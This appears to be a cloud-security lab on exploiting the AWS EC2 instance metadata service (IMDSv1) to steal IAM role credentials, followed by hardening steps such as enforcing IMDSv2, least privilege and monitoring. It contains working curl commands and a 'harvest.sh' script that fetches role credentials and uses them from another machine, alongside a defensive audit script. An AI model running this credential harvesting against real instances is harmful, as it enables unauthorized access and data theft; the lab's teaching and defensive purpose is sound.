Objective:
Understand how attackers can exploit weaknesses in the instance metadata service (IMDS) of cloud environments (e.g., AWS EC2) to retrieve sensitive data such as IAM role credentials. Learn how to secure IMDS by configuring Instance Metadata Service v2 (IMDSv2) and enforcing access control.
Scenario:
An organization deploys an EC2 instance with IMDS improperly configured, allowing unrestricted access to sensitive metadata such as IAM role credentials. An attacker compromises the instance and retrieves the metadata to gain unauthorized access to cloud resources. Your goal is to simulate this attack and demonstrate how to secure IMDS.
Lab Setup:
Prerequisites:
- Access to an AWS account.
- Installed tools:
- aws-cli (Installation Guide).
- curl (pre-installed on most Linux distributions).
Steps to Set Up the Lab:
- Launch an EC2 Instance:
- Navigate to EC2 > Launch Instance.
- Configure the instance:
- AMI: Amazon Linux 2 or Ubuntu.
- Instance Type: t2.micro (free tier eligible).
- IAM Role: Assign an IAM role with permissions to access specific resources (e.g., S3 or DynamoDB).
- Security Group: Allow SSH (port 22) from your IP.
- Launch the instance and note its public IP.
- Enable Metadata Service v1:
- The attack below relies on IMDSv1 being allowed (HttpTokens set to "optional"). Check what the instance currently accepts; run this with aws-cli from a machine that holds credentials for the account, not from inside the instance:
aws ec2 describe-instances --instance-ids <instance-id> --query 'Reservations[].Instances[].MetadataOptions'
- If HttpTokens is "required" (the default for newer AMIs such as Amazon Linux 2023), relax it for the lab:
aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-endpoint enabled --http-tokens optional
- Optionally patch the instance after SSHing in (sudo yum update -y on Amazon Linux); this is unrelated to the metadata settings.
- Set Up IAM Role with Broad Permissions:
- Create an IAM role for EC2 that can list the account's S3 buckets (that is all aws s3 ls needs; widen it if you also want to demonstrate reading bucket contents):
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "s3:ListAllMyBuckets", "Resource": "*" } ] }
- Attach this role to the EC2 instance as its instance profile.
Exercise: Exploiting IMDS
Objective:
Simulate an attacker exploiting IMDS to retrieve sensitive metadata and IAM role credentials.
- Connect to the Instance:
- SSH into the EC2 instance (use ubuntu@ instead of ec2-user@ for an Ubuntu AMI). In this lab you start with a shell; in real incidents the same requests are usually made through an SSRF bug or an open proxy in an application running on the instance, which is exactly the case the token requirement in IMDSv2 defeats:
ssh -i <key-file>.pem ec2-user@<public-ip>
- Access Instance Metadata:
- Use curl to query the IMDS endpoint. 169.254.169.254 is a link-local address answered by the hypervisor, so it is reachable from any process on the instance and no security group applies to it:
curl http://169.254.169.254/latest/meta-data/
- Retrieve metadata such as:
- Instance ID:
curl http://169.254.169.254/latest/meta-data/instance-id
- IAM Role Name (the directory listing returns the name of the attached role):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Retrieve IAM Role Credentials:
- Use curl to fetch the temporary credentials for that role. They are STS credentials (the AccessKeyId starts with ASIA) that expire, normally after about six hours, and are rotated by AWS before they do:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
- Note the AccessKeyId, SecretAccessKey and Token fields, plus Expiration, which tells you how long the stolen credentials remain usable.
- Abuse the IAM Role Credentials:
- Give aws-cli the retrieved credentials. Interactive aws configure does not prompt for the session token, and without AWS_SESSION_TOKEN every call is rejected as an invalid security token, so set all three values as environment variables. Run this from your own workstation rather than from the instance to show that nothing ties the credentials to the EC2 instance:
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
- Confirm who the credentials belong to; the Arn is assumed-role/<role-name>/<instance-id>, which is also how the session appears in CloudTrail:
aws sts get-caller-identity
- Use the credentials to list S3 buckets:
aws s3 ls
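The exercise above collected into one script, as an added example that is not part of the original lab. It fetches the role credentials the IMDSv1 way (a plain GET) and falls back to the IMDSv2 way (session token first), so you can see what the attacker has to do once v2 is enforced, then loads them into the three environment variables aws-cli reads. Assumptions: curl and aws-cli are installed and the script runs on the instance; the credential document at the top is a constructed sample with made-up values, used only to exercise the parsing.

```bash
#!/usr/bin/env bash
# Added example, not part of the original lab: harvest instance-role credentials
# from IMDS the way an attacker with code execution on the box would.
set -u

IMDS="${IMDS:-http://169.254.169.254}"

# Constructed sample of the document IMDS returns for a role (not real credentials).
SAMPLE_CRED_DOC='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEYID",
  "SecretAccessKey" : "exampleSecretKeyNotReal",
  "Token" : "exampleSessionToken==",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

# IMDSv1: an unauthenticated GET. Works only while --http-tokens is "optional".
imds_v1_get() {
    curl -sf "$IMDS/latest/meta-data/$1"
}

# IMDSv2: obtain a session token with a PUT, then present it on the GET.
imds_v2_get() {
    local token
    token=$(curl -sf -X PUT "$IMDS/latest/api/token" \
        -H "X-aws-ec2-metadata-token-ttl-seconds: 60") || return 1
    curl -sf -H "X-aws-ec2-metadata-token: $token" "$IMDS/latest/meta-data/$1"
}

# Pull one field out of the credential document ($1 = field name, $2 = document).
# IMDS prints one "Key" : "value" pair per line, so line-oriented sed is enough.
imds_cred_field() {
    printf '%s\n' "$2" \
        | sed -n "s/.*\"$1\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p" \
        | head -n1
}

# Turn the credential document into the environment variables aws-cli reads.
# Prints the export lines so they can be eval'd (or inspected) by the caller.
imds_creds_to_env() {
    local doc="$1"
    printf 'export AWS_ACCESS_KEY_ID=%s\n'     "$(imds_cred_field AccessKeyId "$doc")"
    printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$(imds_cred_field SecretAccessKey "$doc")"
    printf 'export AWS_SESSION_TOKEN=%s\n'     "$(imds_cred_field Token "$doc")"
}

# End to end: discover the role name, fetch its credentials (v1 first, v2 as the
# fallback), load them into this shell and prove they work.
steal_and_use() {
    local role doc
    role=$(imds_v1_get iam/security-credentials/ || imds_v2_get iam/security-credentials/) || {
        echo "no role attached or IMDS unreachable" >&2; return 1; }
    doc=$(imds_v1_get "iam/security-credentials/$role" \
          || imds_v2_get "iam/security-credentials/$role") || return 1
    eval "$(imds_creds_to_env "$doc")"
    aws sts get-caller-identity   # Arn ends in assumed-role/<role>/<instance-id>
    aws s3 ls
}

if [ "${1:-}" = "run" ]; then
    steal_and_use
fi
```

Run it as `bash harvest.sh run` on the instance. Copying the three export lines it prints to a machine outside AWS and repeating `aws sts get-caller-identity` there is the clearest evidence for the exploit report, and the CloudTrail entry that call produces (role session from a foreign sourceIPAddress) is the detection signal discussed in the solution.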
Tools Required:
- AWS EC2: For deploying the instance.
- curl: For querying the metadata service.
- aws-cli: For using the retrieved IAM role credentials.
Deliverables:
- Exploit Report:
- Evidence of accessing metadata and IAM role credentials via IMDS.
- Screenshots or logs demonstrating unauthorized actions using the retrieved credentials.
- Recommendations for Securing IMDS:
- Steps to configure and enforce IMDSv2, restrict metadata access, and monitor for suspicious activity.
Solution:
- Identified Vulnerabilities:
- IMDSv1 Enabled: IMDSv1 answers any plain GET with no session token, so anything that can make the instance issue an HTTP request (an SSRF bug, a misconfigured reverse proxy, a compromised process) can read the role's credentials.
- Overly Permissive IAM Role: The assigned IAM role had broad permissions, enabling potential abuse.
- No Metadata Access Restrictions: Every local user and process, including containers on the host, could reach the metadata endpoint, and nothing bound the credentials to the instance, so they worked just as well from the attacker's machine.
- Consequences:
- Credential Theft: Attackers can retrieve IAM role credentials and use them to access cloud resources.
- Unauthorized Access: The stolen credentials can be used to list or manipulate cloud resources.
- Data Breach: Sensitive data stored in cloud services (e.g., S3 buckets) could be exposed.
- Prevention Techniques:
- Enforce IMDSv2:
- IMDSv2 answers only requests that carry a session token, and the token is issued only for a PUT request that sets the X-aws-ec2-metadata-token-ttl-seconds header. A plain GET, which is all an SSRF bug, an open proxy or a WAF bypass can usually produce, is refused with HTTP 401, so the attacker needs real code execution on the instance rather than a request-forgery bug.
- Enable IMDSv2 and keep the PUT response hop limit at 1 so that tokens cannot be obtained from one network hop away (for example a bridged container). The change applies to the running instance without a restart:
aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-tokens required --http-put-response-hop-limit 1
- Verify from the instance: the unauthenticated curl http://169.254.169.254/latest/meta-data/ used in the exercise must now return HTTP 401, and the role credentials must only be readable with a token.
- Restrict Metadata Access:
- Security groups and network ACLs do not apply here: 169.254.169.254 is a link-local address served by the hypervisor, so the request never enters the VPC. The controls are on the instance itself. Set --http-endpoint disabled on instances where nothing needs metadata, and on shared hosts use a host firewall (the iptables owner match) so that only the service account that legitimately needs the credentials can reach the endpoint.
- Limit IAM Role Permissions:
- Apply the principle of least privilege: scope the role to the specific buckets, tables and actions the workload needs, so that stolen credentials buy the attacker as little as possible.
- Monitor Credential Use:
- CloudTrail does not see requests to IMDS (they never leave the instance), but it records every API call made with the stolen credentials. Instance-profile credentials show up as the role session assumed-role/<role-name>/<instance-id>; a call from that session with a sourceIPAddress that is not the instance's expected address is credential exfiltration. GuardDuty detects this pattern as UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS (or .InsideAWS when the credentials are used from elsewhere inside AWS).
- Stolen credentials can also be made useless with an IAM policy that denies their use from outside the instance's own VPC. The ec2:SourceInstanceARN and aws:EC2InstanceSourceVPC keys are present only on requests signed with EC2 instance credentials, so other principals are unaffected, and aws:ViaAWSService exempts calls that AWS services make on the role's behalf:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Deny", "Action": "*", "Resource": "*", "Condition": { "StringNotEquals": { "aws:EC2InstanceSourceVPC": "${aws:SourceVpc}" }, "Null": { "ec2:SourceInstanceARN": "false" }, "BoolIfExists": { "aws:ViaAWSService": "false" } } } ] }
- Caveat: aws:SourceVpc is only set when the call reaches the service through a VPC endpoint, so this policy also denies the instance's own calls if they leave through an internet or NAT gateway. Deploy VPC endpoints for the services the workload uses and test the policy in a non-production account first.
- Use Egress Controls:
- Stop the credentials, and the data they unlock, from leaving in the first place: route outbound traffic through a NAT gateway or proxy and allow only the destinations the workload needs. Exfiltration of the credentials, or a bulk download to an attacker-controlled host, then shows up as blocked or unusual outbound connections in VPC Flow Logs or the proxy log.
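An added example, not from the original lab, covering the enforce-and-verify part of the recommendations above: it lists every instance in a region with its metadata options, emits the exact modify-instance-metadata-options command for each one that still accepts IMDSv1 or has a hop limit above 1, verifies from the instance that the unauthenticated request now gets HTTP 401 while the token flow still works, and shows the host-firewall rule that limits IMDS to root. It assumes aws-cli with ec2:DescribeInstances and ec2:ModifyInstanceMetadataOptions permissions, curl, and iptables on the host; the instance table at the top is constructed sample data, not real instances.

```bash
#!/usr/bin/env bash
# Added example, not part of the original lab. Audit a region for instances that
# still accept IMDSv1, print the remediation for each, and verify the result.
set -u

# Constructed sample of describe_metadata_options output (not real instances).
# Columns: InstanceId HttpTokens HttpEndpoint HttpPutResponseHopLimit
SAMPLE_TABLE='i-0aaa111 optional enabled 1
i-0bbb222 required enabled 1
i-0ccc333 optional enabled 2
i-0ddd444 required disabled 1'

# Live version of the table above; --output text gives one tab-separated row per instance.
describe_metadata_options() {
    aws ec2 describe-instances --region "$1" \
        --query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens,MetadataOptions.HttpEndpoint,MetadataOptions.HttpPutResponseHopLimit]' \
        --output text
}

# Reads the table on stdin and prints one remediation command per non-compliant instance.
# HttpTokens=required means IMDSv2 only. A hop limit above 1 lets a bridged container,
# one network hop away, obtain a token, so it is pinned back to 1 as well.
plan_remediation() {
    while read -r id tokens endpoint hops; do
        [ -z "$id" ] && continue
        [ "$endpoint" = "disabled" ] && continue   # IMDS off entirely: nothing to steal
        if [ "$tokens" != "required" ] || [ "$hops" -gt 1 ]; then
            printf 'aws ec2 modify-instance-metadata-options --instance-id %s --http-tokens required --http-put-response-hop-limit 1\n' "$id"
        fi
    done
}

# Number of instances the plan would change, for a table passed as a string.
count_noncompliant() {
    printf '%s\n' "$1" | plan_remediation | wc -l | tr -d ' '
}

# Run on the instance after remediation: an IMDSv2-only instance answers an
# unauthenticated GET with 401, while the PUT-then-GET token flow still works.
verify_imdsv2_enforced() {
    local code token
    code=$(curl -s -o /dev/null -w '%{http_code}' http://169.254.169.254/latest/meta-data/)
    [ "$code" = "401" ] || { echo "IMDSv1 still answers (HTTP $code)" >&2; return 1; }
    token=$(curl -sf -X PUT http://169.254.169.254/latest/api/token \
        -H "X-aws-ec2-metadata-token-ttl-seconds: 60") || return 1
    curl -sf -H "X-aws-ec2-metadata-token: $token" \
        http://169.254.169.254/latest/meta-data/instance-id >/dev/null && echo "IMDSv2 enforced"
}

# Host firewall: only root may talk to IMDS, so a compromised unprivileged service
# account cannot read the role credentials even with code execution. Security groups
# cannot express this; the link-local endpoint never crosses the VPC.
restrict_imds_to_root() {
    sudo iptables -A OUTPUT -d 169.254.169.254 -m owner ! --uid-owner root -j DROP
}

case "${1:-}" in
    audit)    describe_metadata_options "${2:-us-east-1}" | plan_remediation ;;
    apply)    describe_metadata_options "${2:-us-east-1}" | plan_remediation | sh -x ;;
    verify)   verify_imdsv2_enforced ;;
    lockdown) restrict_imds_to_root ;;
esac
```

`bash imds-harden.sh audit eu-west-1` prints the plan without changing anything; `apply` executes it; `verify` is run on the instance afterwards and fails loudly if the unauthenticated path still works. The iptables rule is deliberately separate from the AWS-side change: enforcing IMDSv2 stops request-forgery attacks, while the owner-match rule is what stops a compromised unprivileged process that already has a shell.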
Conclusion:
This exercise demonstrates how improperly configured instance metadata services can expose sensitive information, such as IAM role credentials. By enforcing IMDSv2, restricting metadata access, and applying the principle of least privilege, organizations can secure their cloud environments against metadata exploitation.